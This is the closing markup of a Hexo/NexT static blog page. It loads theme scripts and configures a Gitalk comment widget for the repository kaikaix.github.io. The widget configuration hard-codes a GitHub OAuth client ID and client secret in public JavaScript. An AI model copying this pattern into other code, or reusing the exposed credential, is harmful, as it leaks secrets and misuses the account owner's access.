    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

  

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.css">

<script>
NexT.utils.loadComments(document.querySelector('#gitalk-container'), () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js', () => {
    var gitalk = new Gitalk({
      clientID    : 'e015cfd8a7113f83449a',
      clientSecret: 'ead135fac6fb19fb1953358c28ee9b0dc1625f9a',
      repo        : 'kaikaix.github.io',
      owner       : 'kaikaix',
      admin       : ['kaikaix'],
      id          : '5700ff881f1afdb4b4c6dec24f6bc90c',
        language: 'zh-CN',
      distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
  }, window.Gitalk);
});
</script>

</body>
</html>
